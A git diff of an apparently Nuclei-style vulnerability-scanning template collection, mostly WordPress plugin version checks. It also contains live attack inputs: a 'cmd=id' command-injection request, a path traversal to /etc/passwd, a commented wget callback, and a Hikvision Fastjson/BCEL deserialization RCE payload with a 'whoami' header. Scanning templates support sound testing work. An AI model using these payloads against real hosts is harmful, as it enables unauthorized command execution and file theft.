"{{BaseURL}}/webconf/Exec/index?cmd=id" + - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: word part: body words: - - "200" + - "nologin" - type: status status: - 200 - - -# http: -# - method: GET -# path: -# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" - -# attack: clusterbomb -# matchers-condition: or -# matchers: -# - type: word -# part: interactsh_protocol -# name: http -# words: -# - "http" - -# - type: word -# part: interactsh_protocol -# name: dns -# words: -# - "dns" diff --git a/poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml b/poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml new file mode 100644 index 0000000000..51b37be85a --- /dev/null +++ b/poc/other/advanced-backgrounds-7eca2ce569a1f864194b199d672f550a.yaml @@ -0,0 +1,59 @@ +id: advanced-backgrounds-7eca2ce569a1f864194b199d672f550a + +info: + name: > + Advanced WordPress Backgrounds <= 1.12.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via imageTag Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/78e49869-5e7e-45f2-8239-4df18b28db53?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/advanced-backgrounds/" + google-query: inurl:"/wp-content/plugins/advanced-backgrounds/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,advanced-backgrounds,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-backgrounds/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-backgrounds" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.12.3') \ No newline at end of file diff --git a/poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml b/poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml new file mode 100644 index 0000000000..7da5cecc51 --- /dev/null +++ b/poc/other/delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c.yaml @@ -0,0 +1,59 @@ +id: delicious-recipes-ac134c4c789175dd88aaa9146cd4dc1c + +info: + name: > + WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes) <= 1.6.9 - Improper Path Validation to Authenticated (Subscriber+) Arbitrary File Move and Read + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c98bb53-9f7e-4ab3-9676-e3dbfb4a0519?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/delicious-recipes/" + google-query: inurl:"/wp-content/plugins/delicious-recipes/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,delicious-recipes,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/delicious-recipes/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicious-recipes" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.9') \ No newline at end of file diff --git a/poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml b/poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml new file mode 100644 index 0000000000..ef674f0afd --- /dev/null +++ b/poc/other/elementor-4124ad49f7a0510cf08a935c97d1246a.yaml @@ -0,0 +1,59 @@ +id: elementor-4124ad49f7a0510cf08a935c97d1246a + +info: + name: > + Elementor Website Builder – More than Just a Page Builder <= 3.23.4 - Authenticated (Contributor+) Stored Cross-Site Scripting in the URL Parameter in Multiple Widgets + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a99a64f7-1ea8-4de6-b24f-1f69bf25c1f5?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/elementor/" + google-query: inurl:"/wp-content/plugins/elementor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.23.4') \ No newline at end of file diff --git a/poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml b/poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml new file mode 100644 index 0000000000..53169f4dd7 --- /dev/null +++ b/poc/other/essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3.yaml @@ -0,0 +1,59 @@ +id: essential-addons-for-elementor-lite-6f7de55f53ce42165d9aa81f04368fe3 + +info: + name: > + Essential Addons for Elementor -- Best Elementor Templates, Widgets, Kits & WooCommerce Builders <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Fancy Text Widget + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c5960396-5320-4978-aa82-2e33700daa43?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.3') \ No newline at end of file diff --git a/poc/other/groovy-console-open.yaml b/poc/other/groovy-console-open.yaml index 362d732f8d..b37f3f8d94 100644 --- a/poc/other/groovy-console-open.yaml +++ b/poc/other/groovy-console-open.yaml @@ -1,22 +1,22 @@ id: aem-groovyconsole - info: - name: AEM Groovy console exposed - author: d3sca + name: AEM Groovy Console Discovery + author: Dheerajmadhukar severity: critical - description: Groovy console is exposed. - tags: aem - + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/groovyconsole.html" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -29,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml b/poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml new file mode 100644 index 0000000000..acc833f55e --- /dev/null +++ b/poc/other/html5-video-player-54a27fb63349216a80cf2f59f38ae402.yaml @@ -0,0 +1,59 @@ +id: html5-video-player-54a27fb63349216a80cf2f59f38ae402 + +info: + name: > + HTML5 Video Player – mp4 Video Player Plugin and Block <= 2.5.32 - Missing Authorization in multiple functions via h5vp_ajax_handler + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908df18e-7178-4d40-becb-86e1a714a7da?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/html5-video-player/" + google-query: inurl:"/wp-content/plugins/html5-video-player/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,html5-video-player,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "html5-video-player" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.32') \ No newline at end of file diff --git a/poc/other/jenk.yaml b/poc/other/jenk.yaml index 62a1aba442..1ce87d12b2 100644 --- a/poc/other/jenk.yaml +++ b/poc/other/jenk.yaml @@ -53,4 +53,4 @@ javascript: group: 1 regex: - '\b([a-z_][a-z0-9_-]{0,31})\:x\:' -# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a22e0bf486c5362bd7b22a4d814691dcb9318a631e13e7cf7086dd922feb4dd4022100cfacc9f72ee0cf45347e0c8c97dc2b5c6f95028b6f5cc3a68a506f4d3d4c7964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/nova-blocks.yaml b/poc/other/nova-blocks.yaml new file mode 100644 index 0000000000..77aa268153 --- /dev/null +++ b/poc/other/nova-blocks.yaml @@ -0,0 +1,59 @@ +id: nova-blocks + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file diff --git a/poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml b/poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml new file mode 100644 index 0000000000..1ab732c550 --- /dev/null +++ b/poc/other/post-grid-eaed240a4f4b283e08088fd58f4489e7.yaml @@ -0,0 +1,59 @@ +id: post-grid-eaed240a4f4b283e08088fd58f4489e7 + +info: + name: > + Post Grid and Gutenberg Blocks 2.2.87 - 2.2.90 - Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5f18cae-b7f8-4afd-adfa-c616c63f9419?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/post-grid/" + google-query: inurl:"/wp-content/plugins/post-grid/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,post-grid,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/post-grid/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "post-grid" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 2.2.87', '<= 2.2.90') \ No newline at end of file diff --git a/poc/other/qualitor.yaml b/poc/other/qualitor.yaml new file mode 100644 index 0000000000..3337247c18 --- /dev/null +++ b/poc/other/qualitor.yaml @@ -0,0 +1,20 @@ +id: qualitor +info: + name: qualitor + author: cn-kali-team + tags: detect,tech,qualitor + severity: info + metadata: + fofa-query: + - qualitor + product: qualitor + vendor: qualitor + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: word + words: + - qualitor diff --git a/poc/other/slider-comparison-image-before-and-after.yaml b/poc/other/slider-comparison-image-before-and-after.yaml new file mode 100644 index 0000000000..d38336f96e --- /dev/null +++ b/poc/other/slider-comparison-image-before-and-after.yaml @@ -0,0 +1,59 @@ +id: slider-comparison-image-before-and-after + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file diff --git a/poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml b/poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml new file mode 100644 index 0000000000..12293d4144 --- /dev/null +++ b/poc/other/tracking-code-manager-44229e301b00fab19a97495d12bba74f.yaml @@ -0,0 +1,59 @@ +id: tracking-code-manager-44229e301b00fab19a97495d12bba74f + +info: + name: > + Tracking Code Manager <= 2.2.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9bd1fe45-8518-429b-94d3-cc0ea06ca1b4?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tracking-code-manager/" + google-query: inurl:"/wp-content/plugins/tracking-code-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tracking-code-manager,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tracking-code-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tracking-code-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.0') \ No newline at end of file diff --git a/poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml b/poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml new file mode 100644 index 0000000000..255f27faba --- /dev/null +++ b/poc/php/custom-css-js-php-38595c300b5439c3ff06f9de9b42f302.yaml @@ -0,0 +1,59 @@ +id: custom-css-js-php-38595c300b5439c3ff06f9de9b42f302 + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 0ebd67934b..7e328a8b1b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml @@ -1,27 +1,50 @@ id: HIKVISION info: - name: HIKVISION - author: Zero Trust Security Attack and Defense Laboratory + name: HHIKVISION iVMS-8700 upload Webshell file + author: zerZero Trust Security Attack and Defense Laboratory severity: high description: | - There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability + HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file metadata: - fofa-query: app="HIKVISION-综合安防管理平台" - hunter-query: web.title="综合安防管理平台" + fofa-query: icon_hash="-911494769" + hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" +variables: + str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' + http: - raw: - | - POST /bic/ssoService/v1/applyCT HTTP/1.1 + POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 Host: {{Hostname}} - Content-Type: application/json - Testcmd: whoami - - {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e